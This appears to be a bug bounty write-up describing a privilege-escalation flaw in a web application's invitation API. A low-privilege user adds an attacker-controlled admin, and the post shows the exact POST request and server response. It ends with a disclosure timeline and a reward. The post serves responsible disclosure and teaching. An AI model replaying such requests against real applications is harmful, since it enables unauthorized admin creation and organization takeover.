BOOK THIS SPACE FOR AD
ARTICLE ADIn this write-up I want to share with you the story of a recent finding I discovered during testing a web application.
In the application, there are two roles (Admin and user). During testing, a vulnerability was discovered that allows a user with the user role to add a new admin to the team, despite not having the permission to do so.
By simply sending a POST request as a user to the /api/v3/invitations endpoint
POST /api/v3/invitations HTTP/2Host: dashboard.redacted.com
Content-Type: application/json
Authorization: Basic <low permission user auth>
{
email: "attacker@gmail.com"
role: "admin"
}
Content-Type: application/json; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
{
"response_code":201,
"success":true,
"data": {
"uuid": "<userid>",
"email": "attacker@gmail.com",
"role": "admin"
}
}
BOOM! As a user with no permission to add users, you have successfully added another admin to the organization and can take over the organization by simply logging in with the attacker email address and deleting the admin of the organization.
28/2/2024 : Report sent
5/3/2024 : Triaged
1/4/2024 : Alhamdulillah reward $$$
Thank you for taking the time to read about my experience. If you have any thoughts or questions, please feel free to share them in the comments section. You can also connect with me on
X: (2) Othman 🇵🇸 (@im0thmann) / X (twitter.com)
LinkedIn: https://www.linkedin.com/in/mohamed-othman-46430722a/
Happy hacking and stay secure!